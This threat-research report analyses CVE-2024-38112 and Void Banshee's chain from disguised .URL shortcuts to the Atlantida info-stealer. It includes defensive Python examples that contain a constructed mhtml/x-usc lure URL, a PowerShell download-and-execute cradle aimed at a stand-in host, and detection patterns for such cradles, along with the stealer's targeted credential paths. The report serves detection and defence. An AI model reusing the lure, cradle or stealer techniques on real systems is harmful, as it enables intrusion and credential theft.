CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
By: Peter Girnus, Aliakbar Zahravi
Jul 15, 2024. Read time: 12 min (3358 words)
Published: 2024-07-15 · Archived: 2026-04-02 10:37:54 UTC
Exploits & Vulnerabilities

Our threat hunters discovered CVE-2024-38112, which the APT group Void Banshee used as a zero-day to access and execute files through the disabled Internet Explorer via MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.

Report Highlights:
- In May, ZDI threat hunters under Trend Micro's Zero Day Initiative discovered a vulnerability that the APT group Void Banshee had been exploiting in an updated Atlantida Stealer campaign. We promptly identified and reported it to Microsoft as a zero-day.
- The vulnerability CVE-2024-38112 (ZDI-CAN-24433) was used as a zero-day to access and execute files through the disabled Internet Explorer using MSHTML.
- As part of Void Banshee's attack chain, CVE-2024-38112 is used to infect victim machines with the Atlantida info-stealer, which pilfers system information and sensitive data (such as passwords and cookies) from various applications.
- Void Banshee lures victims with zip archives containing malicious files disguised as PDF copies of books; these are disseminated through cloud-sharing websites, Discord servers, and online libraries, among others.
- Void Banshee's attacks are concentrated in North America, Europe, and Southeast Asia.
- This zero-day attack is a prime example of how unsupported Windows relics are an overlooked attack surface that threat actors can still exploit to infect unsuspecting users with ransomware, backdoors, or other kinds of malware.

For additional background on this entry, please read the ZDI blog entry, "Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD".
Trend Micro Zero Day Initiative (ZDI) discovered the MHTML remote code execution (RCE) vulnerability CVE-2024-38112 and immediately alerted Microsoft that it was being used in the wild, tracking it as ZDI-CAN-24433. (Microsoft's own advisory classifies CVE-2024-38112 as a Windows MSHTML Platform spoofing vulnerability; the chain below shows how that spoofing is turned into code execution through the disabled Internet Explorer.) CVE-2024-38112 was used as part of an attack chain by the advanced persistent threat (APT) group Void Banshee, which targets North American, European, and Southeast Asian regions for information theft and financial gain. The final payload of this zero-day attack chain is the Atlantida stealer, first discovered in January 2024. Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains.

In mid-May 2024, we tracked this updated Void Banshee campaign using internal and external telemetry. The group used similar tactics, techniques, and procedures (TTPs) that involved abusing internet shortcuts (.URL) and Microsoft protocol handlers and URI schemes, including the MHTML (MIME encapsulation of aggregate HTML documents) protocol, which was able to reach the system-disabled Internet Explorer.

In the attack chain shown in Figure 1, the threat actor leveraged CVE-2024-38112 to execute malicious code by abusing the MHTML protocol handler and the x-usc directive through internet shortcut (.URL) files. Using this technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance on Windows machines. This MHTML code execution vulnerability was used to infect users and organizations with Atlantida malware. Trend provides protection against threat actors exploiting CVE-2024-38112 via the security solutions listed at the end of this blog entry.
Internet Explorer used as an attack vector

Internet Explorer (IE) officially reached end of support on June 15, 2022. Additionally, IE has been officially disabled in later versions of Windows 10 and in all versions of Windows 11. Disabled, however, does not mean IE was removed from the system. The remnants of IE still exist on a modern Windows system, though they are not accessible to the average user (Figure 2).

Figure 2. Internet Explorer still exists on modern Windows systems

If a user attempts to run the IE executable (iexplore.exe), its replacement, Microsoft Edge, opens instead. For users and organizations that need to access sites and workloads through Internet Explorer, Microsoft provides IE mode for Microsoft Edge (Figure 3). IE mode contains some IE-specific functionality but operates inside the Microsoft Edge sandbox, which in theory provides enhanced security for the end user.

Figure 3. Internet Explorer mode in Microsoft Edge

In this campaign, the ZDI threat hunting team discovered and analyzed samples exploiting CVE-2024-38112, which we disclosed to Microsoft. These samples could run files and websites through the disabled IE process by exploiting CVE-2024-38112 through MSHTML. By using specially crafted .URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application (HTA) files directly through the disabled IE process. This method of exploitation is similar to CVE-2021-40444, another MSHTML vulnerability that was used in zero-day attacks. Using the disabled IE process as a proxy to access sites and scripts is especially alarming, as IE has historically been a vast attack surface and now receives no further updates or security fixes.
This vulnerability was patched as part of the July 2024 Patch Tuesday. As of this patch cycle, Microsoft has unregistered the MHTML handler from Internet Explorer (Figure 4).

Figure 4. MHTML handler is no longer registered with Internet Explorer

This means that the MHTML handler can no longer be used inside an internet shortcut file to route a target into Internet Explorer. The change ships as part of the Windows update, so hosts that have not applied the July 2024 update remain exposed regardless of IE being "disabled" on them.

Technical analysis

T1566.002: Spearphishing Links

Void Banshee used zip archives containing copies of books in PDF format, along with malicious files disguised as PDFs, in spearphishing links (T1566.002) on online libraries, cloud sharing sites, Discord, and a slew of compromised websites. Some PDF lures we uncovered during our analysis of the Void Banshee campaign include textbooks and reference material such as Clinical Anatomy, which suggests the campaign is targeting highly skilled professionals and students who often use reference materials and frequent places where digital copies of books are collected (Figure 5). To exploit CVE-2024-38112, Void Banshee changed the default icon of the internet shortcut file to that of a PDF file to entice the victim into executing it.

Figure 5. Sample book lure

Stage 1: Malicious internet shortcut (URL) file

Name: Books_A0UJKO.pdf.url
SHA256: c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae
Size: 267 bytes
File type: Internet shortcut

The zero-day attack begins when the victim opens a URL shortcut file designed to exploit CVE-2024-38112. One of the samples we uncovered, "Books_A0UJKO.pdf.url", is designed to look like a PDF copy of a book (Figure 6). The URL shortcut uses the MHTML protocol handler and the x-usc! directive in the internet shortcut's URL parameter.
This logic string is similar to the exploit logic of CVE-2021-40444 (Microsoft Office Remote Code Execution Vulnerability), highlighting the continued misuse of Windows protocol handlers.

Figure 6. Malicious URL file disguised to look like a PDF of a book

In this attack, CVE-2024-38112 was used as a zero-day to open the system-disabled IE and redirect the victim to a compromised website hosting a malicious HTML Application (HTA), as shown in Figure 7.

Figure 7. Content of "Books_A0UJKO"

In the URL parameter of the internet shortcut file, we can see that Void Banshee specifically crafted the URL string using the MHTML protocol handler along with the x-usc! directive. This logic string opens the URL target in native Internet Explorer through the iexplore.exe process.

Stage 2: HTML file downloader

Name: test1.html
SHA256: d8824f643127c1d8f73028be01363fd77b2ecb050ebe8c17793633b9879d20eb
Size: 716 bytes
File type: HTML

As mentioned above, the internet shortcut file that exploits CVE-2024-38112 points to an attacker-controlled domain, where an HTML file downloads the HTA stage of the infection chain (Figure 8). Using this HTML file, the attacker can also control the window size of the site as rendered by IE. The threat actor uses this to hide browser information and to mask the download of the next stage from the victim: Void Banshee specifically crafted this HTML file with window size elements to control the size of the IE window.

Figure 8. Contents of "test1.html"

Once this URL is contacted via IE, it attempts to open the malicious HTA file, prompting the user to open or save the HTML application (Figure 9). This behavior is unique to IE, which offers an "open" action for HTA files by default, whereas modern browsers such as Microsoft Edge or Chrome do not offer that default open action.

Figure 9. Internet Explorer downloads the "Books_A0UJKO.pdf<26 spaces>.hta" file
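Stages 1 and 2 above describe everything an analyst needs to triage one of these shortcuts without opening it on Windows: the mhtml: handler combined with the !x-usc: directive in the URL parameter, the decoy .pdf in front of the real .url extension, and the icon override. The block below is an added example, not code from this article, from ZDI, or from the Void Banshee samples; the sample file content is constructed here, and attacker.example and the Acrobat icon path are placeholders standing in for the real infrastructure and whatever icon source the sample used.

```python
"""Static triage of an Internet shortcut (.URL) file for the stage 1 delivery
pattern. Added example; not code from Trend Micro, ZDI, or the samples. The
sample content at the bottom is constructed, and attacker.example plus the
icon path are placeholders.

A .URL file is INI-style text with an [InternetShortcut] section. Three things
can be checked offline:
  1. URL= starts with the mhtml: handler and carries an !x-usc: directive,
     the combination that routes the target into the disabled IE process;
  2. the file name hides a decoy document extension in front of .url;
  3. an IconFile/IconIndex override is present (used to show a PDF icon).
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# mhtml:<outer>!x-usc:<inner>; the non-greedy outer stops at the first !x-usc:
MHTML_XUSC = re.compile(r"^mhtml:(?P<outer>.+?)!x-usc:(?P<inner>.+)$", re.IGNORECASE)
# Decoy extensions typical of document-themed lures; extend as needed.
DECOY_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")


@dataclass
class UrlShortcut:
    name: str
    url: Optional[str] = None
    icon_file: Optional[str] = None
    icon_index: Optional[str] = None
    findings: List[str] = field(default_factory=list)


def parse_url_shortcut(name: str, text: str) -> UrlShortcut:
    """Minimal [InternetShortcut] parser: tolerates a BOM, CRLF line endings and
    mixed key casing. If URL= appears more than once the first one wins (a
    choice made for this example, not a statement about the Windows shell)."""
    sc = UrlShortcut(name=name)
    section = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section != "internetshortcut" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if key == "url" and sc.url is None:
            sc.url = value
        elif key == "iconfile":
            sc.icon_file = value
        elif key == "iconindex":
            sc.icon_index = value
    return sc


def triage_url_shortcut(name: str, text: str) -> UrlShortcut:
    """Parse the shortcut and attach finding tags in a fixed order."""
    sc = parse_url_shortcut(name, text)
    if sc.url is None:
        sc.findings.append("no-url")
        return sc
    if MHTML_XUSC.match(sc.url):
        sc.findings.append("mhtml-x-usc")      # the CVE-2024-38112 lure pattern
    elif sc.url.lower().startswith("mhtml:"):
        sc.findings.append("mhtml-handler")    # MHTML without x-usc: still unusual in a .URL
    lowered = name.lower()
    if lowered.endswith(".url") and lowered[:-4].rstrip().endswith(DECOY_EXTS):
        sc.findings.append("decoy-extension")  # e.g. Books_A0UJKO.pdf.url
    if sc.icon_file is not None:
        sc.findings.append("icon-override")    # heuristic: shortcut borrows a document icon
    return sc


# Constructed sample modelled on the described layout of Books_A0UJKO.pdf.url.
SAMPLE_NAME = "Books_A0UJKO.pdf.url"
SAMPLE_TEXT = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:http://attacker.example/te/test1.html"
    "!x-usc:http://attacker.example/te/test1.html\r\n"
    "IconFile=C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe\r\n"  # placeholder
    "IconIndex=0\r\n"
)

if __name__ == "__main__":
    result = triage_url_shortcut(SAMPLE_NAME, SAMPLE_TEXT)
    print(result.url)
    print(", ".join(result.findings) or "clean")
```

The mhtml-x-usc tag is the one that matters for this campaign; the decoy-extension and icon-override tags are lure heuristics that also fire on legitimate shortcuts with custom icons, so treat them as supporting evidence rather than verdicts. After the July 2024 update the MHTML handler no longer reaches IE, but a .URL file carrying this string is still worth quarantining because it identifies the lure.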
The attacker adds 26 spaces before the .hta extension of "Books_A0UJKO.pdf<26 spaces>.hta" to push the real extension off the screen (Figure 10). The ellipsis indicates that the filename contains additional content, but it is not clickable or expandable. To an unsuspecting user, the file appears to be merely a PDF.

Figure 10. The HTA file extension does not appear on the screen

Stage 3: HTA file and VBS downloader

Name: Books_A0UJKO.pdf<26 spaces>.hta
SHA256: 87480b151e465b73151220533c965f3a77046138f079ca3ceb961a7d5fee9a33
Size: 1,662 bytes
File type: HTML Application (HTA)

The HTA file contains a Visual Basic Script (VBScript) that decrypts XOR-encrypted content with the single-byte key 4 and executes the result using PowerShell (Figure 11). The PowerShell command downloads an additional script hosted on a compromised web server and executes it using the irm (Invoke-RestMethod) and iex (Invoke-Expression) aliases. Finally, the VBScript creates a new process for that command using the Win32_Process WMI class.

Figure 11. The VBScript in the HTA file

Stage 4: PowerShell trojan downloader

Name: become.txt
SHA256: c85eedd51dced48b3764c2d5bdb8febefe4210a2d9611e0fb14ffc937b80e302
Size: 551 bytes
File type: PowerShell

Initially, the script defines DllImport attributes to import two functions: GetConsoleWindow from kernel32.dll, which retrieves the handle of the console window associated with the calling process, and ShowWindow from user32.dll, which sets the visibility state of the specified window. It then uses the Add-Type cmdlet to add the type defined in $crop213 to the current PowerShell session, under the namespace crumble542543 with the name culture6546.
Next, the script retrieves the handle of the console window using GetConsoleWindow and stores it in $danger5646. It then calls ShowWindow with that handle and the parameter 0 (SW_HIDE), which hides the console window. This technique is often employed by malware to run without displaying any user interface. The script then creates a new System.Net.WebClient object, which is used to download data from a malicious server. The downloaded data is loaded as a .NET assembly using System.Reflection.Assembly's Load method. Finally, the script invokes the entry point of the downloaded assembly, executing the code it contains.

Figure 12. Contents of the "become.txt" PowerShell file

Stage 5: .NET trojan loader

Name: LoadToBadXml.exe, tedfd.te, Vnn3qRKOxH.exe
SHA256: 13907caae48ea741942bce60fa32087328475bd14f5a81a6d04d82286bd28b4d
Size: 6,994,432 bytes
File type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

LoadToBadXml is a .NET trojan loader obfuscated with Eziriz .NET Reactor. As shown in Figure 13, it decrypts XOR-encrypted payloads using the byte-array key (3, 2, 2).

Figure 13. The payload decryption process

It then injects them into C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe. The malware employs a common process injection technique with the following steps:
- Create process: the malware uses the CreateProcess Windows API to launch RegAsm.exe in a suspended state.
- Memory allocation: it allocates space within the RegAsm.exe process using the VirtualAllocEx API.
- Write payload: the decrypted payload is then written into the allocated memory using the WriteProcessMemory API.
- Execute payload: finally, the malware creates a remote thread within RegAsm.exe to execute the injected payload using the CreateRemoteThread API.
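Stage 3 protects its payload with single-byte XOR key 4 and stage 5 with the byte-array key (3, 2, 2). Both are plain repeating-key XOR, so an analyst who can guess even a few bytes of plaintext (a crib) does not need to reverse the decryption routine: each crib byte XORed with its ciphertext byte yields one key byte. The block below is an added example, not code from the samples or from this article; the ciphertexts are constructed here by encrypting placeholder plaintexts, so no byte from the real files appears, and the PowerShell cradle and URL inside the stage 3 stand-in are invented.

```python
"""Recovering and applying the repeating-key XOR used by the HTA stage (single
byte key 4) and by LoadToBadXml (byte-array key 3, 2, 2). Added example; not
code from the samples or from Trend Micro. The ciphertexts below are
constructed here by encrypting placeholder plaintexts.

Both stages use plain XOR with a short repeating key, so any predictable stretch
of plaintext (a "crib") gives the key directly:
    key[i % len(key)] = ciphertext[i] ^ plaintext[i]
A crib at least as long as the key pins down every key byte; a longer crib also
cross-checks the guess, because a wrong key length or offset produces a
contradiction.
"""
from itertools import cycle
from typing import Iterable, Optional


def xor_repeating(data: bytes, key: Iterable[int]) -> bytes:
    """XOR data against a repeating key. XOR is an involution, so the same
    call encrypts and decrypts."""
    key = bytes(key)
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes, crib: bytes, key_len: int, offset: int = 0) -> Optional[bytes]:
    """Derive a key_len-byte key from a known plaintext located at offset.
    Returns None when the crib is too short to cover every key position or
    when two crib bytes disagree about the same key byte."""
    if len(crib) < key_len or offset + len(crib) > len(ciphertext):
        return None
    slots: list = [None] * key_len
    for i, p in enumerate(crib):
        pos = offset + i
        k = ciphertext[pos] ^ p
        slot = pos % key_len
        if slots[slot] is None:
            slots[slot] = k
        elif slots[slot] != k:
            return None  # contradiction: wrong crib, offset or key length
    return bytes(slots)


def brute_force_single_byte(ciphertext: bytes, marker: bytes) -> Optional[int]:
    """Try all 256 single-byte keys; return the first one whose output
    contains marker. Useful when the crib's position is unknown."""
    for k in range(256):
        if marker in xor_repeating(ciphertext, [k]):
            return k
    return None


# Constructed stand-ins for the two encrypted blobs ---------------------------
# Stage 3 look-alike: a PowerShell download cradle (placeholder URL) under key 4.
STAGE3_PLAIN = b'powershell -w hidden -c "irm http://attacker.example/become.txt | iex"'
STAGE3_CIPHER = xor_repeating(STAGE3_PLAIN, [4])
# Stage 5 look-alike: a PE-style DOS header plus filler under the three-byte key.
STAGE5_PLAIN = b"MZ\x90\x00" + b"\x00" * 12 + b"placeholder payload bytes"
STAGE5_CIPHER = xor_repeating(STAGE5_PLAIN, [3, 2, 2])


def recover_stage3_key() -> Optional[int]:
    # An HTA-embedded cradle almost always contains the interpreter name.
    return brute_force_single_byte(STAGE3_CIPHER, b"powershell")


def recover_stage5_key() -> Optional[bytes]:
    # Three key bytes need a crib of at least three bytes; "MZ\x90" at offset 0.
    return recover_key(STAGE5_CIPHER, b"MZ\x90", key_len=3)


if __name__ == "__main__":
    k3 = recover_stage3_key()
    print("stage 3 key:", k3, xor_repeating(STAGE3_CIPHER, [k3])[:32])
    k5 = recover_stage5_key()
    print("stage 5 key:", list(k5), xor_repeating(STAGE5_CIPHER, k5)[:4])
```

In practice the key length is the unknown: try small lengths with a crib and keep the first that returns without a contradiction, or, once the decrypted output is readable, confirm by checking that it parses as the next stage (a script for stage 3, a valid PE or shellcode blob for stage 5). The brute-force helper is only viable for single-byte keys; a three-byte key space is 2^24 and needs the crib approach.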
LoadToBadXml is a modified version of the shellcode injector from Program.cs of the open-source project Donut Loader (Figure 14).

Figure 14. LoadToBadXml injects the decrypted Donut loader into the RegAsm.exe process

Stage 6: Donut loader

SHA256: 119b0994bcf9c9494ce44f896b7ff4a489b62f31706be2cb6e4a9338b63cdfdb
Size: 6.59 MB (6,918,144 bytes)
File type: Shellcode

Donut is open-source position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files, and .NET assemblies. In this attack, Donut is used to decrypt and execute the Atlantida stealer inside the RegAsm.exe process memory.

Stage 7: Atlantida stealer analysis

Name: AtlantidaStealer.exe
SHA256: 6f1f3415c3e52dcdbb012f412aef7b9744786b2d4a1b850f1f4561048716c750
Size: 6.6 MB (6,883,112 bytes)
Compilation time: 2024-01-25 15:52:03
File type: PE32 executable (GUI) Intel 80386, for MS Windows

The final payload delivered in this attack is the Atlantida stealer, an info-stealer with extensive capabilities. Overall, the malware is built from the open-source stealers NecroStealer and PredatorTheStealer, incorporating many of the same functions and structures found in those programs. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, various cryptocurrency wallets, and web browsers. The malware focuses on extracting stored sensitive and potentially valuable data, such as passwords and cookies, and it can also collect files with specific extensions from the infected system's desktop. Moreover, the malware captures the victim's screen and gathers comprehensive system information.
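The delivery chain in stages 1 through 5 leaves a distinctive process and file trail on the endpoint: the disabled iexplore.exe being started at all, an HTA whose name hides its extension behind a run of spaces, mshta.exe handing off to a WMI-spawned PowerShell that runs an irm | iex cradle, and RegAsm.exe started with no arguments purely as an injection host. As an added example (not a Trend Micro detection or a Vision One model), the block below replays that trail as a small rule set over constructed Sysmon-style events. The events are invented for this example, every path, user name and host in them is a placeholder, and two links are inferences rather than facts stated above: that mshta.exe appears as a child of iexplore.exe, and that the PowerShell created through Win32_Process shows WmiPrvSE.exe as its parent (the latter is normal WMI behaviour).

```python
"""Replaying the delivery chain of stages 1 to 5 against endpoint telemetry.
Added example; not Trend Micro detection content or a Vision One model. Events
use a Sysmon-like field layout (EventType, Image, ParentImage, CommandLine,
TargetFilename) that you would map onto your EDR's schema. SAMPLE_EVENTS are
constructed; every path, user and host in them is a placeholder. Two parent/
child links are inferences from the analysis text rather than facts stated on
the page and are marked as assumptions in the comments.
"""
import re
from typing import Dict, List

Event = Dict[str, str]

# "<decoy>.pdf<run of spaces>.hta": the extension-hiding trick of stage 2/3.
PADDED_DOUBLE_EXT = re.compile(
    r"\.(?:pdf|docx?|xlsx?)[ ]{2,}\.(?:hta|url|js|vbs|lnk)$", re.IGNORECASE)
# irm/iwr piped into iex: the download cradle carried by the HTA's VBScript.
DOWNLOAD_CRADLE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|]*\|\s*(?:iex|invoke-expression)\b",
    re.IGNORECASE)
# RegAsm.exe followed by at least one argument; a real registration names a DLL.
REGASM_WITH_ARGS = re.compile(r'regasm\.exe"?\s+\S', re.IGNORECASE)
DEV_TOOL_PARENTS = {"devenv.exe", "msbuild.exe", "msiexec.exe", "installutil.exe"}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: Event) -> List[str]:
    """Return the names of every rule the event triggers, in rule order."""
    hits: List[str] = []
    if event.get("EventType") == "FileCreate":
        if PADDED_DOUBLE_EXT.search(event.get("TargetFilename", "")):
            hits.append("padded-double-extension")
        return hits
    img, parent = _base(event.get("Image", "")), _base(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    # Stage 1: IE is disabled, so nothing legitimate starts it. The page's own
    # Vision One model is named "Svchost Executes Iexplorer"; the command line
    # is deliberately not inspected because its exact form is not documented.
    if img == "iexplore.exe" and parent == "svchost.exe":
        hits.append("disabled-ie-started")
    # Stage 3: IE prompts to open the HTA; the mshta.exe that results is
    # assumed here to be IE's child.
    if img == "mshta.exe" and parent == "iexplore.exe":
        hits.append("mshta-child-of-ie")
    # Stage 3/4: the VBScript starts PowerShell through Win32_Process, and
    # WMI-created processes have WmiPrvSE.exe as parent; the command line
    # carries the irm | iex cradle.
    if img in ("powershell.exe", "pwsh.exe"):
        if parent == "wmiprvse.exe":
            hits.append("powershell-via-wmi")
        if DOWNLOAD_CRADLE.search(cmd):
            hits.append("powershell-download-cradle")
    # Stage 5: the loader starts RegAsm.exe suspended, with no arguments, purely
    # as a host for the injected payload.
    if (img == "regasm.exe" and not REGASM_WITH_ARGS.search(cmd)
            and parent not in DEV_TOOL_PARENTS):
        hits.append("regasm-without-arguments")
    return hits


def evaluate_all(events: List[Event]) -> List[List[str]]:
    return [evaluate(e) for e in events]


# Constructed telemetry for one infection, plus one benign control at the end.
IE = "C:\\Program Files\\Internet Explorer\\iexplore.exe"
REGASM = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
PADDED = "Books_A0UJKO.pdf" + " " * 26 + ".hta"
SAMPLE_EVENTS: List[Event] = [
    {"EventType": "ProcessCreate", "Image": IE,
     "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": '"' + IE + '"'},
    {"EventType": "FileCreate", "Image": IE,
     "TargetFilename": "C:\\Users\\victim\\Downloads\\" + PADDED},
    {"EventType": "ProcessCreate", "Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": IE,
     "CommandLine": '"C:\\Windows\\System32\\mshta.exe" "C:\\Users\\victim\\Downloads\\' + PADDED + '"'},
    {"EventType": "ProcessCreate",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": 'powershell -c "irm http://attacker.example/become.txt | iex"'},
    {"EventType": "ProcessCreate", "Image": REGASM,
     "ParentImage": "C:\\Users\\victim\\AppData\\Local\\Temp\\LoadToBadXml.exe",
     "CommandLine": '"' + REGASM + '"'},
    {"EventType": "ProcessCreate", "Image": REGASM,  # benign: developer registering a DLL
     "ParentImage": "C:\\Program Files\\Microsoft Visual Studio\\Common7\\IDE\\devenv.exe",
     "CommandLine": '"' + REGASM + '" /codebase MyLib.dll'},
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, evaluate_all(SAMPLE_EVENTS)):
        print(_base(event.get("Image", "")), "->", hits or "no alert")
```

Each rule on its own is noisy in some environments (developers do run RegAsm.exe, administrators do run irm | iex), which is why the example keeps them as independent tags: correlating two or more of them on the same host within a short window, in this order, is what makes the chain recognisable. The padded-filename rule is the cheapest of the set and has essentially no benign counterpart.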
The stolen data is then compressed into a ZIP file and transmitted to the attacker via TCP.

Upon execution, the malware initializes the ZIP file, sets up the necessary structures, and manages the process of writing files to the archive. It then retrieves the "APPDATA" and "DESKTOP" paths using the SHGetFolderPathA Windows API with the CSIDL values 0x1A (CSIDL_APPDATA) and 0x00 (CSIDL_DESKTOP), respectively, and stores them in a global variable that is used throughout the code to access these locations. Afterward, it takes a screenshot, saves it as "screenshot.jpeg", and adds it to the ZIP. The compression method is similar to the one used in zip.cpp of Necro Stealer and PredatorTheStealer.

To retrieve the infected system's geolocation information, such as IP address, country, and zip code, the malware contacts its command-and-control (C&C) server over port 6666 instead of using public services. Figure 15 shows an example of a C&C response:

Figure 15. C&C response with the infected system's geolocation information

The malware then stores this in "Geo Information.txt" and appends it to the ZIP archive (Figure 16). Next, the malware starts to collect system information such as RAM, GPU, CPU, and screen resolution and stores it in "User Information.txt", subsequently appending this file to the ZIP archive held in memory (Figure 17).

Furthermore, the malware harvests credentials and sensitive files from various applications. For FileZilla, the malware searches for the XML file located at C:\Users\<Username>\AppData\Roaming\FileZilla\recentservers.xml, which contains information about recently connected servers. This XML file typically includes data such as the server's hostname, port number, username, and connection type.
Additionally, the malware attempts to steal data that includes:
- All files with the ".txt" extension from the infected system's desktop directory
- All JSON files under C:\Users\<Username>\AppData\Roaming\Binance
- Telegram data under C:\Users\<Username>\AppData\Roaming\Telegram Desktop
- Steam configurations
- Cookies and credentials from the Google Chrome, Mozilla Firefox, and Microsoft Edge web browsers

The Atlantida stealer can also steal information from cryptocurrency-related Google Chrome and Microsoft Edge extensions. Each extension is identified by its extension ID, which the malware uses to locate and harvest the data stored under this path:

C:\Users\<Username>\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\<Extension ID>

The following is the list of targeted cryptocurrency wallet browser extensions. The IDs are reproduced as found in the malware: note that Guarda and NiftyWallet carry the same ID, and GuildWallet appears twice with different IDs, so a lookup keyed on ID alone will not map back to a unique name.

Extension name       Google Chrome extension ID
AuroWallet           cnmamaachppnkjgnildpdmkaakejnhae
BinanceWallet        fhbohimaelbohpjbbldcngcnapndodjp
BitClip              ijmpgkjfkbfhoebgogflfebnmejmfbml
Bitoke               oijajbhmelbcoclnkdmembiacmeghbae
BitAppWallet         fihkakfobkmkjojpchpfgcmhfjnmnfpi
Byone                nlgbhdfgdhgbiamfdfmbikcdghidoadd
CardWallet           apnehcjmnengpnmccpaibjmhhoadaico
CloverWallet         nhnkbkgjikgcigadomkphalanndcapjk
Coin89               aeachknmefphepccionboohckonoeemg
CryptoAirdrops       dhgnlgphgchebgoemcjekedjjbifijid
CyanoWallet          dkdedlpgdmmkkfjabffeganieamfklkm
EQUALWallet          blnieiiffboillknjnepogjhkgnoapac
Flint                hnhobjmcibchnmglfbldbfabcgaknlkj
FreaksAxie           copjnifcecdedocejpaapepagaodgpbh
Guarda               jbdaocneiiinmjbjlgalhcelgbejmnid
GuildWallet          nkddgncdjgjfcddamfgcmfnlhccnimig
guildwallet          nanjmdknhkinifnkgdcggcfnhdaammmj
HyconLiteClient      bcopgchhojmggmffilplmbdicgaihlkp
ICONex               flpiciilemghbmfalicajoolhkkenfel
iWallet              kncchdigobghenbbaddojjnnaogfppfj
Keplr                dmkamcknogkgcdfhhbddcghachkejeap
KHC                  hcflpincpppdclinealmandijcmnkbgn
Leaf Wallet          cihmoadaighcejopammfbmddcmdekcje
LiqualityWallet      kpfopkelmapcoipemfendmdcghnegimn
MathWallet           afbcbjpbpfadlkmhmclhkeeodmamcflc
Metamask             nkbihfbeogaeaoehlefnkodbefgpgknn
MetaWallet           bkklifkecemccedpkhcebagjpehhabfb
MEW CX               nlbmnnijcnlegkjjpcfjclmcfggfefdm
NaboxWallet          nknhiehlklippafakaeklbeglecifhad
Nami                 lpfcbjknijpeeillifnkikgncikgfhdo
NashExtension        onofpnbbkehpmmoabgpcpmigafmmnjhl
NiftyWallet          jbdaocneiiinmjbjlgalhcelgbejmnid
Oasis                ppdadbejkmjnefldpcdjhnkpbjkikoip
OneKey               infeboajgfhgbjpjbeppbkgnabfdkdaf
Phantom              bfnaelmomeimhlpmgjnjophhpkkoljpa
Polymesh Wallet      jojhfeoedkpkglbfimdfabpdfjaoolaf
Rabby                acmacodkjbdgmoleebolmdjonilkdbch
Saturn Wallet        cphhlgmgameodnhkjdmkpanlelnlohao
sollet               fhmfendgdocmcbmfikdcogofphimnkno
TerraStation         aiifbnbfobpmeekipheeijimdpnlpgpp
Temple               ookjlbkiijinhpmnjffcofjonbfbgaoc
TezBox               mnfifefkajgofkcjkemidiaecocnkjeh
TronWallet           pnndplcbkakcplkjnolgbkdgjikjednm
Wombat               amkmjjmmflddogmhpjloimipbofnfjih
XDefiWallet          hmeobnfnfcmdkdcmlblgagmfpfboieaf
Yoroi                ffnbelfdoeiohenkjibnmadjiehjhajb

Extension name       Microsoft Edge extension ID
MetaMask             ejbalbakoplchlghecdalmeeeajnimhm

The malware compresses all the collected data into a ZIP file and exfiltrates it to the attacker's C&C server over TCP port 6655.

Figure 18. Example of exfiltration of stolen data

Conclusion

In this campaign, we observed that even though users may no longer be able to access IE, threat actors can still exploit lingering Windows relics like IE to infect users and organizations with ransomware and backdoors, or use them as a proxy to execute other strains of malware. The ability of APT groups like Void Banshee to exploit disabled components such as IE poses a significant threat to organizations worldwide. Since components such as IE have a large attack surface and no longer receive patches, they represent a serious security concern for Windows users.
Furthermore, the ability of threat actors to reach unsupported and disabled system components in order to circumvent modern web sandboxes such as IE mode for Microsoft Edge highlights a significant industry concern.

To make software more secure and protect customers from zero-day attacks, Trend ZDI works with security researchers and vendors to patch and responsibly disclose software vulnerabilities before APT groups can deploy them in attacks. The ZDI Threat Hunting team also proactively hunts for zero-day attacks in the wild to safeguard the industry. The ZDI program is the largest vendor-agnostic bug bounty program in the world, disclosing vulnerabilities to vendors at 2.5x the rate.

Organizations can help protect themselves from these kinds of attacks with Trend Vision One™, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. This is all backed by advanced threat research, intelligence, and AI, which helps reduce the time taken to detect, respond, and remediate issues. Ultimately, Vision One can help improve the overall security posture and effectiveness of an organization, including against zero-day attacks.

When faced with uncertain intrusions, behaviors, and routines, organizations should assume that their systems are already compromised or breached and work to immediately isolate affected data or toolchains.
With a broader perspective and rapid response, organizations can address breaches and protect their remaining systems, especially with technologies such as Trend Micro Endpoint Security and Trend Micro Network Security, as well as comprehensive security solutions such as Trend Micro™ XDR, which can detect, scan, and block malicious content across the modern threat landscape.

Trend protections

